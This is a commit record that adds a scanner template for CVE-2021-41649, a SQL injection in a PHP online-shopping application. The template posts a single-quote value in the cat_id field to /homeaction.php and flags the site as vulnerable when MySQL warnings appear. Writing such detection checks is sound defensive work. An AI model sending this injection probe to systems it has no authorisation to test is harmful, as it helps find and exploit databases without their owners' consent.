Merge pull request #2814 from daffainfo/patch-234

Create CVE-2021-41649.yaml
2021-10-04 19:39:12 +05:30 · 2021-10-04 19:39:12 +05:30 · 7182361020
parent c8f24c940c 0f5d9ac24d
commit 7182361020
1 changed files with 34 additions and 0 deletions
--- a/cves/2021/CVE-2021-41649.yaml
+++ b/cves/2021/CVE-2021-41649.yaml
@ -0,0 +1,34 @@
+id: CVE-2021-41649
+
+info:
+  name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php
+  author: daffainfo
+  severity: high
+  description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
+  reference: https://github.com/MobiusBinary/CVE-2021-41649
+  tags: cve,cve2021,sqli
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/homeaction.php"
+    body: "cat_id=4'&get_seleted_Category=1"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
+
+      - type: word
+        words:
+          - "Warning: mysqli_num_rows() expects parameter 1 to be"
+          - "xdebug-error xe-warning"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200